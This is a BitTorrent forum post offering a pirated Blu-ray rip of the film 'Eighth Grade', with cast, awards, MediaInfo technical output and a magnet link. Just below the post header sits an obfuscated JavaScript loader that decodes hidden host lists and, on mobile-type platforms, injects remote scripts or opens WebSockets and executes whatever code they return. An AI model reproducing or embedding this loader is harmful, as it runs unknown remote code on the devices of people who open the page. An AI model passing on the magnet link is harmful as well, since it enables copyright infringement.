八年级[双语字幕]Eighth.Grade.2018.1080p.BluRay.x264.DTS-迅雷下载 10.30GB

版主小s 2月前 324

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x62\x50\x73\x42\x6e\x58\x4f\x42\x73\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXlxa2RmODc5Zi5hc2xleXR5LmNvbbSxodHRwczovL29oamZrN2pmMjguZ3Nqemxzc3dzLmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译  名 八年级 / 8th Grade / The Coolest Girl in the World
◎片  名 Eighth Grade
◎年  代 2018
◎产  地 美国
◎类  别 喜剧
◎语  言 英语
◎上映日期 2018-01-19(圣丹斯电影节) / 2018-08-03(美国)
◎IMDb评分  7.4/10 from 61345 users
◎IMDb链接  https://www.imdb.com/title/tt7014006
◎豆瓣评分 6.6/10 from 8606 users
◎豆瓣链接 https://movie.douban.com/subject/27109381/
◎片  长 94分钟
◎导  演 博·伯翰 Bo Burnham
◎编  剧 博·伯翰 Bo Burnham
◎主  演 艾尔西·费舍尔 Elsie Fisher
       约什·汉密尔顿 Josh Hamilton
       艾米丽·罗宾森 Emily Robinson
       杰克·莱恩 Jake Ryan
       丹尼尔·祖尔格哈德利 Daniel Zolghadri
       弗莱德·赫钦格 Fred Hechinger
       艾曼尼·刘易斯 Imani Lewis
       卢克·普拉尔 Luke Prael
       凯瑟琳·奥利维雷 Catherine Oliviere
       诺拉·姆林斯 Nora Mullins
       蜜西·雅格 Missy Yager
       格雷戈·克罗 Greg Crowe
       弗兰克·迪尔 Frank Deal
       黛博拉·安格 Deborah Unger
       威廉·温施 William Wunsch
       丹·陈 Dan Chen
       汤姆·斯特拉特福 Tom Stratford
       J·塔克·史密斯 J. Tucker Smith
       沙察·捷米罗夫 Shacha Temirov
       玛格丽特·斯廷普森 Marguerite Stimpson
       凯文·R·弗里 Kevin R. Free
       娜塔莉·卡特 Natalie Carter
       大卫·石 David Shih
       托马斯·约翰·奥雷利 Thomas John O'Reilly


◎标  签 青春 | 成长 | 美国 | 校园 | 2018 | 喜剧 | 美国电影 | 独立电影

◎简  介  

  故事讲述13岁的凯拉(艾尔西·费舍尔 饰)在初中的最后一周,所经历的青春故事...

◎获奖情况  

  第76届金球奖(2019)
  电影类 音乐/喜剧片最佳女主角(提名) 艾尔西·费舍尔

  第34届圣丹斯电影节(2018)
  评审团大奖 剧情片(提名) 博·伯翰

  第71届美国导演工会奖(2019)
  最佳新人导演奖 博·伯翰

  第71届美国编剧工会奖(2019)
  电影奖 最佳原创剧本 博·伯翰

  第84届纽约影评人协会奖(2018)
  最佳处女作

  第90届美国国家评论协会奖(2018)
  最佳导演处女作 博·伯翰
  年度佳片

  第24届美国评论家选择电影奖(2019)
  最佳青少年演员 艾尔西·费舍尔
  喜剧片最佳女主角(提名) 艾尔西·费舍尔
  最佳原创剧本(提名) 博·伯翰

  第34届美国独立精神奖(2019)
  最佳影片(提名)
  最佳女主角(提名) 艾尔西·费舍尔
  最佳男配角(提名) 约什·汉密尔顿
  最佳处女作剧本 博·伯翰

  第28届哥谭独立电影奖(2018)
  年度突破演员 艾尔西·费舍尔
  最佳突破导演奖 博·伯翰

  第19届美国电影学会奖(2018)
  年度佳片

  第23届金卫星奖(2019)
  电影部门 喜剧/音乐片最佳女主角(提名) 艾尔西·费舍尔
  电影部门 最佳独立片(提名)
  电影部门 最佳原创剧本(提名) 博·伯翰

  第17届华盛顿影评人协会奖(2018)
  最佳原创剧本(提名) 博·伯翰
  最佳青少年表演 艾尔西·费舍尔

  第39届波士顿影评人协会奖(2018)
  最佳处女作 博·伯翰

  第31届芝加哥影评人协会奖(2018)
  最佳原创剧本(提名) 博·伯翰
  最具潜力演员 艾尔西·费舍尔
  最具潜力导演(提名) 博·伯翰

  第17届旧金山影评人协会奖(2018)
  最佳原创剧本(提名) 博·伯翰

  第18届温哥华影评人协会奖(2018)
  最佳剧本(提名) 博·伯翰

  第52届堪萨斯影评人协会奖(2018)
  最佳原创剧本(提名)

  第18届凤凰城影评人协会奖(2018)
  最具突破表演 艾尔西·费舍尔
  最佳青年女演员 艾尔西·费舍尔

  第12届底特律影评人协会奖(2018)
  最佳影片
  最佳男配角 约什·汉密尔顿

  第3届亚特兰大影评人协会奖(2018)
  十佳影片
  突破表演奖 艾尔西·费舍尔

  第22届美国在线影评人协会奖(2019)
  最佳影片(提名)
  最佳原创剧本(提名) 博·伯翰
  最佳新导演(提名) 博·伯翰

  1. General
  2. Unique ID                                : 108552085603564502112459237288593011074 (0x51AA5F0834A92E86AF8A2C91B3B33182)
  3. Complete name                            : [email protected]
  4. Format                                   : Matroska
  5. Format version                           : Version 4
  6. File size                                : 10.3 GiB
  7. Duration                                 : 1 h 33 min
  8. Overall bit rate                         : 15.7 Mb/s
  9. Movie name                               : Eighth Grade 2018
  10. Encoded date                             : UTC 2021-07-06 10:53:45
  11. Writing application                      : mkvmerge v58.0.0 ('Supper's Ready') 64-bit
  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4
  13. Cover                                    : Yes
  14. Attachments                              : cover.jpg
  15. Video
  16. ID                                       : 1
  17. Format                                   : AVC
  18. Format/Info                              : Advanced Video Codec
  19. Format profile                           : [email protected]
  20. Format settings                          : CABAC / 4 Ref Frames
  21. Format settings, CABAC                   : Yes
  22. Format settings, Reference frames        : 4 frames
  23. Codec ID                                 : V_MPEG4/ISO/AVC
  24. Duration                                 : 1 h 33 min
  25. Bit rate                                 : 14.1 Mb/s
  26. Width                                    : 1 920 pixels
  27. Height                                   : 1 036 pixels
  28. Display aspect ratio                     : 1.85:1
  29. Frame rate mode                          : Constant
  30. Frame rate                               : 23.976 (24000/1001/53354) FPS
  31. Color space                              : YUV
  32. Chroma subsampling                       : 4:2:0
  33. Bit depth                                : 8 bits
  34. Scan type                                : Progressive
  35. Bits/(Pixel*Frame)                       : 0.296
  36. Stream size                              : 9.25 GiB (90%)
  37. Writing library                          : x264 core 163 r3059+79M f2a8266 t_mod_test_xavc [(8 & 10)[email protected] X86_64]
  38. Encoding settings                        : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=32 / lookahead_threads=8 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=18.0000 / qcomp=0.60 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.75 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0
  39. Language                                 : English
  40. Default                                  : Yes
  41. Forced                                   : No
  42. Audio
  43. ID                                       : 2
  44. Format                                   : DTS
  45. Format/Info                              : Digital Theater Systems
  46. Codec ID                                 : A_DTS
  47. Duration                                 : 1 h 33 min
  48. Bit rate mode                            : Constant
  49. Bit rate                                 : 1 509 kb/s
  50. Channel(s)                               : 6 channels
  51. Channel layout                           : C L R Ls Rs LFE
  52. Sampling rate                            : 48.0 kHz
  53. Frame rate                               : 93.750 FPS (512 SPF)
  54. Bit depth                                : 24 bits
  55. Compression mode                         : Lossy
  56. Stream size                              : 1 011 MiB (10%)
  57. Language                                 : English
  58. Default                                  : Yes
  59. Forced                                   : No
  60. Text #1
  61. ID                                       : 3
  62. Format                                   : PGS
  63. Muxing mode                              : zlib
  64. Codec ID                                 : S_HDMV/PGS
  65. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  66. Duration                                 : 1 h 30 min
  67. Bit rate                                 : 53.5 kb/s
  68. Count of elements                        : 2047
  69. Stream size                              : 34.6 MiB (0%)
  70. Title                                    : chs&eng
  71. Language                                 : Chinese
  72. Default                                  : Yes
  73. Forced                                   : No
  74. Text #2
  75. ID                                       : 4
  76. Format                                   : PGS
  77. Muxing mode                              : zlib
  78. Codec ID                                 : S_HDMV/PGS
  79. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  80. Duration                                 : 1 h 30 min
  81. Bit rate                                 : 53.8 kb/s
  82. Count of elements                        : 2047
  83. Stream size                              : 34.8 MiB (0%)
  84. Title                                    : cht&eng
  85. Language                                 : Chinese
  86. Default                                  : No
  87. Forced                                   : No
  88. Text #3
  89. ID                                       : 5
  90. Format                                   : PGS
  91. Muxing mode                              : zlib
  92. Codec ID                                 : S_HDMV/PGS
  93. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  94. Duration                                 : 1 h 30 min
  95. Bit rate                                 : 30.1 kb/s
  96. Count of elements                        : 2047
  97. Stream size                              : 19.4 MiB (0%)
  98. Title                                    : chs
  99. Language                                 : Chinese
  100. Default                                  : No
  101. Forced                                   : No
  102. Text #4
  103. ID                                       : 6
  104. Format                                   : PGS
  105. Muxing mode                              : zlib
  106. Codec ID                                 : S_HDMV/PGS
  107. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  108. Duration                                 : 1 h 30 min
  109. Bit rate                                 : 30.1 kb/s
  110. Count of elements                        : 2047
  111. Stream size                              : 19.4 MiB (0%)
  112. Title                                    : cht
  113. Language                                 : Chinese
  114. Default                                  : No
  115. Forced                                   : No
  116. Text #5
  117. ID                                       : 7
  118. Format                                   : PGS
  119. Muxing mode                              : zlib
  120. Codec ID                                 : S_HDMV/PGS
  121. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  122. Duration                                 : 1 h 30 min
  123. Bit rate                                 : 47.9 kb/s
  124. Count of elements                        : 2744
  125. Stream size                              : 31.0 MiB (0%)
  126. Language                                 : English
  127. Default                                  : No
  128. Forced                                   : No
  129. Menu
  130. 00:00:00.000                             : Chapter 01
  131. 00:05:44.635                             : Chapter 02
  132. 00:11:00.534                             : Chapter 03
  133. 00:16:20.854                             : Chapter 04
  134. 00:19:55.986                             : Chapter 05
  135. 00:27:18.094                             : Chapter 06
  136. 00:33:08.444                             : Chapter 07
  137. 00:39:54.808                             : Chapter 08
  138. 00:43:08.877                             : Chapter 09
  139. 00:49:21.374                             : Chapter 10
  140. 00:54:41.152                             : Chapter 11
  141. 01:01:44.700                             : Chapter 12
  142. 01:09:07.393                             : Chapter 13
  143. 01:13:05.881                             : Chapter 14
  144. 01:15:39.076                             : Chapter 15
  145. 01:22:23.188                             : Chapter 16


TAGS 喜剧

磁力链:
  • magnet:?xt=urn:btih:7F4D6F511935A3FFBA7951F2EEB278AF444C0E41
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回